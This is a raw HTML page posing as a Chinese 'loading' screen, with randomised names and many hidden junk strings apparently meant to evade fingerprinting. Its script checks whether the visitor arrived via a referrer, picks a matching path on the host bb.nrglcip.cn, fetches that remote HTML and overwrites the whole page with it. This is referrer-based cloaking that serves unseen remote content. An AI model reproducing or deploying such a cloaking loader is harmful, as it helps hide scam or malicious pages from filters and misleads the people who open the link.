<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .pJT4HWlnso {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .pJT4HWlnso .gvGCs1 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .pJT4HWlnso .content {
            line-height: 50px;
            text-align: center
        }

        .pJT4HWlnso .img {
            width: 100%
        }

        .pJT4HWlnso .qwzZrjgc {
            text-align: center
        }

        .pJT4HWlnso .qwzZrjgc span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .pJT4HWlnso .qwzZrjgc span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .pJT4HWlnso .qwzZrjgc span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .pJT4HWlnso .qwzZrjgc span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .pJT4HWlnso .qwzZrjgc span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .pJT4HWlnso .qwzZrjgc span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .pJT4HWlnso .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function PVQTKgFm9KWN9(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var aC3Xvi5 = PVQTKgFm9KWN9('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ aC3Xvi5 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ aC3Xvi5 +".html?a=share";
		}
		
        NEujUzJF7U=url+"#"+new Date().getTime();
        NEujUzJF7U && function() {
            $.get(NEujUzJF7U, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >TjxUdcLPYvVvZpn4LBKBgMO5u2RgKKwrjNltZHtXoXDejVQaS8kzDN</b>
<span style='display:none'>sWfcdfXyHDWYHny0lGuMkiaL9U4lPocl0QCHR</span>
<div style='display:none'>G75kX1BNusAWzkrD0Lpk5N4DSvjR1</div>
<b style='display:none' >TjxUdcLPYvVvZpn4LBKBgMO5u2RgKKwrjNltZHtXoXDejVQaS8kzDN</b>
<span style='display:none'>sWfcdfXyHDWYHny0lGuMkiaL9U4lPocl0QCHR</span>
<li style='display:none' >yGGyejFNoIcVqoHMmxCjx8gAx3PdofP0FxUzOJPBWVIKk</li>
<b style='display:none' >TjxUdcLPYvVvZpn4LBKBgMO5u2RgKKwrjNltZHtXoXDejVQaS8kzDN</b>
<h1 style='display:none' >W2EaI6i9To9bizIpdd0ZK3YjdmbJEcR1gpjLBVwg27aUXIuEBcMlEpaSFr7rAYf8PpQe5clyI12DnM1pIxyNZ4L2TWz</h1><div class="pJT4HWlnso">
    <div class="gvGCs1">
        <div class="qwzZrjgc">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>ftinI7CsJSSIfvoTaquKijzTeHkJCaLEHdBHB1Aolyg2</p>
<p  style='display:none'>ftinI7CsJSSIfvoTaquKijzTeHkJCaLEHdBHB1Aolyg2</p>
<ul style='display:none' >k5JTOLDE6hGqe1zjm3kxoVbPxk8S6gzyTzwgy4rdDJHveHnr68ONoFkj171411Pe6oH9gb</ul>
<span style='display:none'>eVc0pKTW5hLMwaTSWuORl5vtdqLnImXTUMA2vDJHbBDlpi4KudS9WTuw58</span>
<ul style='display:none' >k5JTOLDE6hGqe1zjm3kxoVbPxk8S6gzyTzwgy4rdDJHveHnr68ONoFkj171411Pe6oH9gb</ul>
<img  src='' style='display:none'>
<div style='display:none'>dKyMBV1UMkwDHGAoMhbfVTnz1y0clEJswUAf47AUNCVoojgXeulLMlLfeCaAxkSQj1GilZKddqDvhtPyf9wWtavbUGwx</div></body>
</html>